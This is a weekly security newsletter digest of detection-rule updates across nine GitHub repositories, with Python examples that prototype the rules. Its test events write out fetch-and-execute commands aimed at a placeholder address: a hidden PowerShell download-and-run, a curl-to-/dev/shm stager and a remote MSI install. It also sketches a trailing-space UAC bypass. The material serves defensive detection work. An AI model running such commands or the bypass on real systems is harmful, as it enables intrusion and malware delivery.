Detections Digest #20250630
This issue highlights key updates to detection rules from 9 GitHub repositories, including 33 new additions and 36 modifications.
This week's update highlights the most significant changes to detection rules from 9 of the 40+ monitored GitHub repositories. Between Jun 23 and Jun 30, 2025, contributors added 33 new rules and updated 36 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
New rules target a Windows UAC bypass that loads DLLs from a spoofed system path containing a trailing space (C:\Windows \System32\), and the existing TrustedPath rule now also covers C:\Windows \SysWOW64\. Detections were also added for the 'FileFix' social engineering technique, identifying LOLBINs spawned from browsers with a '#' in the command line. Both repositories also introduced rules to detect the MeshAgent RAT by its '--meshServiceName' command-line argument, even when the executable is renamed. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
Detection for Microsoft cloud services has expanded. New Elastic rules identify Entra ID refresh token theft and anomalous mail access in Microsoft 365. In parallel, new KQL queries hunt for M365 Direct Send abuse, risky external OAuth applications, and high-privilege identities using the Defender Exposure Graph. (elastic/detection-rules, SlimKQL/Hunting-Queries-Detection-Rules, alexverboon/Hunting-Queries-Detection-Rules)
Detections for Linux endpoint threats have increased. A new Sigma rule finds common malware stagers that use curl or wget to download payloads into /dev/shm and execute them. Elastic Protections added a YARA rule for generic Linux rootkits that looks for kernel symbol lookups, and updated signatures for Mirai variants. (SigmaHQ/sigma, elastic/protections-artifacts)
Phishing detections were updated to address current techniques. New rules identify brand impersonation of services such as Zoom and Dropbox, some of them using machine learning models. Existing rules were modified to counter keyword obfuscation with regular expressions, check link text for homograph attacks, and analyze PDFs inside attached EML files. (sublime-security/sublime-rules)
Rule logic was refined across multiple repositories to improve accuracy. Elastic improved its Kubernetes rules by targeting the Kubernetes audit log index to increase query performance. New osquery rules from Chainguard detect potential Salesforce data exfiltration on macOS and Linux by looking for specific file names and metadata. Sigma reduced false positives in its remote thread creation rules by excluding legitimate system processes. (elastic/detection-rules, SigmaHQ/sigma, chainguard-dev/osquery-defense-kit)
💡 Make updates from this digest operational.
CTIChef.com delivers all detection rules from this digest (and more) as structured, high-fidelity CTI feeds. Subscribe and integrate directly into your SIEM, TIP, or SOAR to automate threat detection and enrich your existing security data.
No sales talk, transparent pricing, fast integration, and clear value.
Table Of Contents
Corporate repositories (6)
sublime-security/sublime-rules (+4, ✎4)
SigmaHQ/sigma (+7, ✎4)
Yamato-Security/hayabusa-rules (+9, ✎4)
elastic/detection-rules (+3, ✎15)
chainguard-dev/osquery-defense-kit (+2)
elastic/protections-artifacts (+1, ✎9)
Personal repositories (3)
SlimKQL/Hunting-Queries-Detection-Rules (+4)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
alexverboon/Hunting-Queries-Detection-Rules (+2)
Corporate repositories (6)
sublime-security/sublime-rules (+4, ✎4)
+ New rules
Four new rules detect phishing attacks, including brand impersonation of Zoom, Dropbox, and Intuit. The detections identify common phishing indicators such as links to free file hosting services, sender anomalies, and mismatched links. Several rules use machine learning models to analyze message content for credential theft intent. (Zoom Events Newsletter Abuse, Mismatched Links: Free File Share With Urgent Language, Deceptive Dropbox Mention, Link: Intuit Link Abuse with File Share Context)
✎ Modified rules
Two rules targeting brand and service impersonation were updated. The e-signature phishing rule now uses regular expressions against obfuscated keywords and checks link text for homograph attacks. The TikTok impersonation rule adds body keyword checks for verification-themed lures. (Credential Phishing: Suspicious E-sign Agreement Document Notification, Brand Impersonation: TikTok)
Detection logic was broadened for phishing emails with suspicious technical characteristics. One rule now analyzes PDFs inside attached EML files and has refined metadata checks for auto-generated documents. Another rule more reliably identifies mass emails sent to 'undisclosed recipients' through case-insensitive pattern matching and a relaxed BCC count. (Attachment: Suspicious PDF Created With Headless Browser, Suspicious Recipients pattern with NLU credential theft indicators)
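The two link checks described above (display text pointing at one domain while the href goes elsewhere, and homograph hosts in link text) are straightforward to prototype. The block below is an added illustration written for this digest, not Sublime's MQL or any rule from the repository. It approximates the registrable domain as the last two labels (a real rule would use the public suffix list), takes the Unicode script from character names, and runs over constructed (link text, href) pairs that are not taken from any message.

```python
import re
import unicodedata
from urllib.parse import urlparse

# Something that looks like a dotted host name inside link text. \w is Unicode-aware,
# so IDN labels written with e.g. Cyrillic letters are captured as well.
HOST_RE = re.compile(r"([\w-]+(?:\.[\w-]+)+)")


def registrable(host):
    """Crude registrable domain (last two labels). Assumption: a production rule
    would consult the public suffix list so that 'example.co.uk' is handled."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def letter_scripts(text):
    """Unicode scripts of the letters in text, read off the character names
    ('LATIN SMALL LETTER A' -> 'LATIN', 'CYRILLIC SMALL LETTER A' -> 'CYRILLIC')."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in text if ch.isalpha()}


def analyze_link(text, href):
    """Flag a mismatched link (host shown in the text differs from the destination)
    and a homograph (non-ASCII letters in either host, typically a script mix that
    mimics a Latin brand name). Returns a dict of findings."""
    href_host = (urlparse(href).hostname or "").lower()
    m = HOST_RE.search(text)
    display_host = m.group(1).lower() if m else None
    result = {"display_host": display_host, "href_host": href_host,
              "mismatched": False, "homograph": False, "scripts": [], "punycode": None}
    if display_host:
        result["mismatched"] = registrable(display_host) != registrable(href_host)
    for host in (display_host, href_host):
        if host and any(ord(ch) > 127 for ch in host):
            result["homograph"] = True
            result["scripts"] = sorted(letter_scripts(host))
            try:
                # The IDNA (punycode) form is the name a browser actually resolves.
                result["punycode"] = host.encode("idna").decode("ascii")
            except UnicodeError:
                pass
    return result


# Constructed (link text, href) pairs for illustration; not real messages.
SAMPLE_LINKS = [
    ("https://www.dropbox.com/s/abc123/Contract.pdf", "https://files.free-host.example/dl/9f2a"),
    ("Review the agreement at docusign.com", "https://www.docusign.com/sign/abc"),
    ("Verify your account at \u0430pple.com", "https://\u0430pple.com/verify"),  # Cyrillic 'a'
    ("Zoom Events newsletter", "https://zoom.us/events"),
]


def flag_links(links):
    return [analyze_link(text, href) for text, href in links]


if __name__ == "__main__":
    for finding in flag_links(SAMPLE_LINKS):
        print(finding)
```

The third sample is the reason the homograph check has to exist separately from the mismatch check: display text and href agree, so a domain comparison alone passes it, while the mixed Latin/Cyrillic script and the xn-- form give the game away.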
SigmaHQ/sigma (+7, ✎4)
+ New rules
New rules detect the MeshAgent remote access tool on Windows and macOS. The detection logic keys on the '--meshServiceName' command-line argument, which identifies the agent even when the executable has been renamed; the 'Renamed' variants additionally compare the binary's original file name with the name on disk to find altered instances. (Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Potential MeshAgent Execution - MacOS, Remote Access Tool - Renamed MeshAgent Execution - MacOS, Remote Access Tool - Renamed MeshAgent Execution - Windows)
A new rule detects a UAC bypass technique on Windows. It identifies DLL loading from a spoofed system path containing a trailing space, for example 'C:\Windows \System32\', which the trusted-path check normalizes to the real system directory; an auto-elevating binary copied into the spoofed directory can then load an attacker-controlled DLL at high integrity. (Trusted Path Bypass via Windows Directory Spoofing)
A new rule identifies a common malware stager pattern on Linux. The detection targets the use of curl or wget to download payloads into temporary directories such as /dev/shm and immediately execute them with a shell. (Suspicious Download and Execute Pattern via Curl/Wget)
A new rule detects the 'FileFix' social engineering technique. It identifies web browsers spawning LOLBINs with a '#' character in the command line. In FileFix the victim is lured into pasting a command into the File Explorer address bar that a browser's file-upload dialog opens, and the '#' hides the command behind a benign-looking file path. (FileFix - Suspicious Child Process from Browser File Upload Abuse)
✎ Modified rules
Two Windows detections were refined to lower false positives. The rule for AppX package sideloading now excludes installations from OneDrive paths, and the rule for suspicious remote thread creation now filters out legitimate interactions from Defrag.exe and VMware Tools. (Uncommon AppX Package Locations, Rare Remote Thread Creation By Uncommon Source Image)
Detection coverage was expanded for defense evasion techniques on Windows and Linux. The rule for the Windows UAC bypass using trailing-space directories now also covers the C:\Windows \SysWOW64\ path. The rule for Linux log clearing now also detects journal purging via journalctl --vacuum (the --vacuum-size, --vacuum-time and --vacuum-files options). (Commands to Clear or Remove the Syslog, TrustedPath UAC Bypass Pattern)
Yamato-Security/hayabusa-rules (+9, ✎4)
+ New rules
Multiple new rules detect execution of the MeshAgent RMM tool, including renamed instances. Detection logic keys on the '--meshServiceName' command-line argument in Windows process creation events (Security 4688 and Sysmon Event ID 1), which finds the tool even if the executable name is changed. Each title is listed twice because hayabusa-rules carries a separate variant of a rule for each Windows log source it supports. (Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Potential MeshAgent Execution - Windows, Remote Access Tool - Renamed MeshAgent Execution - Windows, Remote Access Tool - Renamed MeshAgent Execution - Windows)
New rules detect remote MSI package installation via PowerShell. The logic identifies use of the WindowsInstaller.Installer COM object (its InstallProduct method with an http(s) or UNC package path), which hands the install to the Windows Installer service so that no msiexec.exe command line carrying the package path appears; this can be used for malicious software deployment. (PowerShell MSI Install via WindowsInstaller COM From Remote Location, PowerShell MSI Install via WindowsInstaller COM From Remote Location)
Two new rules detect the 'FileFix' social engineering technique. They identify system utilities spawned from browser processes where the command line contains a '#' character, a specific indicator of this attack where a user is tricked into running commands. (FileFix - Suspicious Child Process from Browser File Upload Abuse, FileFix - Suspicious Child Process from Browser File Upload Abuse)
A new rule detects a UAC bypass technique involving DLL loading from a spoofed Windows directory. The detection finds paths with an extra space, such as 'C:\Windows \System32', used to bypass trusted path verification. (Trusted Path Bypass via Windows Directory Spoofing)
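The process-creation rules summarized in this and the SigmaHQ/sigma section above (MeshAgent and renamed MeshAgent, Trusted Path spoofing, FileFix, the curl/wget stager and the WindowsInstaller COM install) all reduce to a handful of predicates over command-line and path fields. The block below is an added example written for this digest, not code from either repository, and its predicates approximate rather than reproduce the published rules. It uses Sysmon-style field names (Image, ParentImage, CommandLine, OriginalFileName, ImageLoaded, ScriptBlockText); the browser and LOLBIN lists, the address 203.0.113.5 and every event are constructed for illustration.

```python
import re


def basename(path):
    """Final path component, lower-cased, for Windows or POSIX paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}        # assumption
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe"}  # assumption
SPOOFED_DIRS = ("c:\\windows \\system32\\", "c:\\windows \\syswow64\\")    # trailing space
# curl/wget writing under a temp dir, then a command separator and an executor
# (sh/bash, chmod +x, or direct execution of the dropped file).
STAGER_RE = re.compile(
    r"\b(?:curl|wget)\b.*?(?:/dev/shm|/tmp|/var/tmp)/[^\s;&|]+.*?"
    r"(?:;|&&|\|\|)\s*(?:sh|bash|chmod\s+\+x|(?:/dev/shm|/tmp|/var/tmp)/)", re.S)


def meshagent(e):
    return "--meshservicename" in e.get("CommandLine", "").lower()


def renamed_meshagent(e):
    # Agent behaviour or PE original name says MeshAgent, but the file on disk is called something else.
    looks_like_mesh = meshagent(e) or e.get("OriginalFileName", "").lower() == "meshagent.exe"
    return looks_like_mesh and basename(e.get("Image", "")) != "meshagent.exe"


def trusted_path_spoof(e):
    fields = (e.get("Image", ""), e.get("CommandLine", ""), e.get("ImageLoaded", ""))
    return any(d in f.lower() for f in fields for d in SPOOFED_DIRS)


def filefix(e):
    return (basename(e.get("ParentImage", "")) in BROWSERS
            and basename(e.get("Image", "")) in LOLBINS
            and "#" in e.get("CommandLine", ""))


def curl_wget_stager(e):
    return STAGER_RE.search(e.get("CommandLine", "")) is not None


def com_msi_remote(e):
    t = e.get("ScriptBlockText", "") + " " + e.get("CommandLine", "")
    return ("windowsinstaller.installer" in t.lower() and "installproduct" in t.lower()
            and re.search(r"https?://|\\\\", t) is not None)  # http(s) URL or UNC path


RULES = {
    "Remote Access Tool - Potential MeshAgent Execution": meshagent,
    "Remote Access Tool - Renamed MeshAgent Execution": renamed_meshagent,
    "Trusted Path Bypass via Windows Directory Spoofing": trusted_path_spoof,
    "FileFix - Suspicious Child Process from Browser File Upload Abuse": filefix,
    "Suspicious Download and Execute Pattern via Curl/Wget": curl_wget_stager,
    "PowerShell MSI Install via WindowsInstaller COM From Remote Location": com_msi_remote,
}

# Constructed events; not real telemetry.
EVENTS = [
    {"id": 1, "Image": r"C:\Program Files\Mesh Agent\MeshAgent.exe", "OriginalFileName": "meshagent.exe",
     "CommandLine": r'"C:\Program Files\Mesh Agent\MeshAgent.exe" --meshServiceName="Mesh Agent"',
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"id": 2, "Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "meshagent.exe",
     "CommandLine": r'svchost.exe --meshServiceName="Support"', "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 3, "Image": r"C:\Windows \System32\WerFault.exe", "ImageLoaded": r"C:\Windows \System32\wer.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.5/a.ps1|iex" # C:\company\Invoice.pdf',
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"id": 5, "Image": "/usr/bin/bash", "ParentImage": "/usr/bin/python3",
     "CommandLine": "bash -c 'curl -fsSL http://203.0.113.5/x -o /dev/shm/x; chmod +x /dev/shm/x; /dev/shm/x'"},
    {"id": 6, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ScriptBlockText": '$i = New-Object -ComObject WindowsInstaller.Installer; $i.InstallProduct("http://203.0.113.5/update.msi")'},
    {"id": 7, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt", "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 8, "Image": "/usr/bin/curl", "ParentImage": "/usr/bin/bash",
     "CommandLine": "curl -o /tmp/report.csv https://intranet.example/report"},
]


def evaluate(events):
    """Map each event id to the list of rule titles that fire on it."""
    return {e["id"]: [name for name, rule in RULES.items() if rule(e)] for e in events}


if __name__ == "__main__":
    for event_id, hits in evaluate(EVENTS).items():
        print(event_id, hits or "-")
```

Events 7 and 8 are the negatives worth keeping in any test set: a curl that only downloads (no separator followed by an executor) must not trip the stager rule, and a plain explorer.exe child must not trip FileFix.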
✎ Modified rules
Two rules detecting process injection via remote thread creation (Sysmon Event ID 8) were updated. The changes add new exclusions for legitimate system behaviors involving processes like explorer.exe, winlogon.exe, and Defrag.exe. This reduces false positives for detections that monitor both common and uncommon source processes. (Remote Thread Creation By Uncommon Source Image, Rare Remote Thread Creation By Uncommon Source Image)
Detection coverage for a User Account Control bypass technique was broadened across two rules. The updates add the C:\Windows \SysWOW64\ path to identify malicious process creation from spoofed trusted directories, improving detection of this bypass on 64-bit systems. (TrustedPath UAC Bypass Pattern, TrustedPath UAC Bypass Pattern)
elastic/detection-rules (+3, ✎15)
+ New rules
Three new rules add detection for Microsoft cloud threats. The rules identify credential abuse and data exfiltration by monitoring for suspicious mail access via unusual client applications, Entra ID sign-in patterns indicating refresh token theft, and excessive access to mailbox items in Microsoft 365. (Suspicious Microsoft 365 Mail Access by Unusual ClientAppId, Entra ID RT to PRT Transition from Same User and Device, Excessive Microsoft 365 Mailbox Items Accessed)
✎ Modified rules
Multiple Kubernetes detection rules were updated to query the specific logs-kubernetes.audit_logs-* index instead of a broad pattern. This change improves query performance and accuracy for rules that detect container privilege escalation, sensitive host path mounting, and service account abuse by focusing searches on Kubernetes audit logs. (Kubernetes Container Created with Excessive Linux Capabilities, Kubernetes Pod Created With HostIPC, Kubernetes Denied Service Account Request, Kubernetes Suspicious Self-Subject Review, Kubernetes User Exec into Pod, Kubernetes Pod Created With HostPID, Kubernetes Privileged Pod Created, Kubernetes Pod created with a Sensitive hostPath Volume, Kubernetes Suspicious Assignment of Controller Service Account)
Several AWS rules for detecting infrequent activity were updated for greater precision. Detections for SSM command execution and STS role assumption now use the combination of cloud.account.id and user.name to identify new user actions, so the same user name seen in a different account counts as new. This change provides more reliable detection of potential credential abuse and privilege escalation. (AWS SSM SendCommand Execution by Rare User, AWS STS Role Assumption by User, AWS STS Role Assumption by Service, AWS SSM Command Document Created by Rare User)
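Why the composite key matters is easiest to see on data. The block below is an added example for this digest, not Elastic's rule logic or query: a simplified first-seen check that learns (key tuple) pairs during a baseline window and reports any later event whose key was never seen. Elastic's new-terms rules work over a rolling history window in Elasticsearch; here a fixed baseline cut-off stands in for that. The CloudTrail-like events with ECS-style field names are constructed for illustration.

```python
# Constructed CloudTrail-style events with ECS-like field names; not real logs.
EVENTS = [
    {"@timestamp": "2025-06-23T08:00:00Z", "event.action": "SendCommand",
     "cloud.account.id": "111111111111", "user.name": "ops-admin"},
    {"@timestamp": "2025-06-24T09:00:00Z", "event.action": "SendCommand",
     "cloud.account.id": "111111111111", "user.name": "ops-admin"},
    {"@timestamp": "2025-06-29T10:00:00Z", "event.action": "SendCommand",
     "cloud.account.id": "222222222222", "user.name": "ops-admin"},   # same name, other account
    {"@timestamp": "2025-06-29T11:00:00Z", "event.action": "AssumeRole",
     "cloud.account.id": "111111111111", "user.name": "ci-runner"},
    {"@timestamp": "2025-06-30T12:00:00Z", "event.action": "SendCommand",
     "cloud.account.id": "111111111111", "user.name": "contractor"},
]

BASELINE_END = "2025-06-28T00:00:00Z"   # assumption: end of the learning window


def first_seen(events, action, key_fields, baseline_end):
    """Return (timestamp, key) for events after baseline_end whose key tuple never
    appeared for this action during the baseline window. Timestamps are ISO-8601
    UTC strings of identical shape, so plain string comparison orders them."""
    seen = set()
    hits = []
    for e in sorted(events, key=lambda ev: ev["@timestamp"]):
        if e["event.action"] != action:
            continue
        key = tuple(e.get(f, "") for f in key_fields)
        if e["@timestamp"] <= baseline_end:
            seen.add(key)
        elif key not in seen:
            hits.append((e["@timestamp"], key))
            seen.add(key)   # report each new term once
    return hits


if __name__ == "__main__":
    print("user.name only :", first_seen(EVENTS, "SendCommand", ("user.name",), BASELINE_END))
    print("account + user :", first_seen(EVENTS, "SendCommand",
                                         ("cloud.account.id", "user.name"), BASELINE_END))
```

Keyed on user.name alone, the SendCommand from account 222222222222 is invisible because 'ops-admin' was already seen in account 111111111111; keyed on (cloud.account.id, user.name) it surfaces as a new term alongside the genuinely new 'contractor'.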
The rule for detecting suspicious NewCredentials logon events (logon type 9) on Windows was modified to reduce false positives. The update refines process path exclusions to better filter legitimate applications, keeping the focus on token impersonation techniques. (First Time Seen NewCredentials Logon Process)
The correlation rule for identifying hosts with alerts across multiple MITRE ATT&CK tactics was updated. The rule now groups alerts using both host.id and host.name, improving the reliability of identifying systems undergoing multi-stage attacks. (Multiple Alerts in Different ATT&CK Tactics on a Single Host)
chainguard-dev/osquery-defense-kit (+2)
+ New rules
Two new OSQuery rules detect potential data exfiltration from Salesforce on macOS and Linux. One rule uses Spotlight metadata on macOS to find large files originating from Salesforce domains. The other rule identifies common Salesforce export file naming conventions in user download directories on both operating systems. (Surface Salesforce exports (possible data exfiltration), Salesforce Large Download Generic)
elastic/protections-artifacts (+1, ✎9)
+ New rules
A new YARA rule for Elastic EDR detects Linux rootkits. The rule identifies loadable kernel modules that attempt to resolve kernel symbols, a common technique for function hooking. Detection is based on finding the kallsyms_lookup_name_t string along with specific open-source license strings within the module. (Linux_Rootkit_Generic_5d17781b)
✎ Modified rules
Two YARA rules now detect specific variants of the Linux.Trojan.Mirai malware on x86 systems. Detection is based on matching unique hexadecimal byte sequences in files or memory. (Linux_Trojan_Mirai_0cb1699c, Linux_Trojan_Mirai_d5f2abe2)
A rule for detecting Linux rootkits now identifies a wider range of malicious indicators. It searches for combinations of function names, keywords, and system-level strings associated with kernel hooking, process hiding, and privilege escalation on x86 and arm64 architectures. (Linux_Rootkit_Generic_5d17781b)
Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that consolidates updates from 80+ sources (government organizations, cybersecurity vendors, threat intelligence teams, security research labs, and blogs from cybersecurity communities and professionals).
Personal repositories (3)
SlimKQL/Hunting-Queries-Detection-Rules (+4)
+ New rules
Two new rules target abuse of Microsoft 365 services. One detects phishing attempts using the Direct Send feature by monitoring specific DNS query patterns. The other identifies potentially malicious external OAuth applications in Exchange Online by flagging uncommon user access from foreign locations. (Direct Send Abuse Detection, Detect anomalous external OAuthApp activity using ActorInfoString)
A new hunting query detects a campaign using Cloudflare Tunnels for malware delivery. The rule ingests an external list of IOCs and searches for matches across email, file, and network telemetry in Microsoft Defender XDR. (Hackers Exploit Cloudflare Tunnels to Infect Windows Systems With Python Malware)
A new query hunts for the execution of mshta.exe, a utility often used by adversaries for proxy code execution. The rule monitors DeviceProcessEvents for any command-line invocation of this binary. (Suspicious MSHTA Usage)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
+ New rules
A new KQL rule detects command-line data exports to text or CSV files. This activity is a common data staging method used before exfiltration, often seen in ransomware attacks gathering local system or Active Directory information. (Detecting Text and CSV Data Dumps via Command Line)
alexverboon/Hunting-Queries-Detection-Rules (+2)
+ New rules
Two new KQL queries use the Microsoft Defender XDR Exposure Graph to identify high-risk cloud configurations. One rule detects identities assigned 'Owner' or 'Contributor' roles to find privilege escalation risks. The other identifies potential lateral movement paths by correlating vulnerable VMs with access to critical storage accounts. (High-Privilege Identities Across Subscriptions, Trace Lateral Movement)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.